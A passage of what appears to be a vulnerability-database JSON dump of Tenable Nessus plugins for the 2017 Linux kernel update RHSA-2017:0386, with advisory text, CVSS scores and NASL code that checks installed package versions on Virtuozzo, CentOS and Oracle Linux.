cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:14:13", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. 
(CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. 
Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-07-13T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs", "p-cpe:/a:virtuozzo:virtuozzo:kernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools", "cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:kernel-headers", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists", "p-cpe:/a:virtuozzo:virtuozzo:kernel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-perf", "p-cpe:/a:virtuozzo:virtuozzo:kernel-doc", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:perf"], "id": "VIRTUOZZO_VZLSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/101431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101431);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2016-8630\",\n \"CVE-2016-8655\",\n \"CVE-2016-9083\",\n \"CVE-2016-9084\"\n );\n\n script_name(english:\"Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0386)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for 
kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. 
To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0386.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43a5fb2d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0386\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.10.2.vl7\",\n \"kernel-abi-whitelists-3.10.0-514.10.2.vl7\",\n \"kernel-debug-3.10.0-514.10.2.vl7\",\n \"kernel-debug-devel-3.10.0-514.10.2.vl7\",\n \"kernel-devel-3.10.0-514.10.2.vl7\",\n \"kernel-doc-3.10.0-514.10.2.vl7\",\n \"kernel-headers-3.10.0-514.10.2.vl7\",\n \"kernel-tools-3.10.0-514.10.2.vl7\",\n \"kernel-tools-libs-3.10.0-514.10.2.vl7\",\n \"kernel-tools-libs-devel-3.10.0-514.10.2.vl7\",\n \"perf-3.10.0-514.10.2.vl7\",\n \"python-perf-3.10.0-514.10.2.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / 
kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:01", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. 
This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-07T00:00:00", "title": "CentOS 7 : kernel (CESA-2017:0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-07T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0386 and \n# CentOS Errata and Security Advisory 2017:0386 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97558);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-8630\", 
\"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2017:0386)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. 
(CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-March/022324.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d0d2dd9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8655\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", 
reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:08", "description": "From Red Hat Security Advisory 2017:0386 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. 
(CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. 
To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-03T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0386 and \n# Oracle Linux Security Advisory ELSA-2017-0386 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97506);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0386)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more 
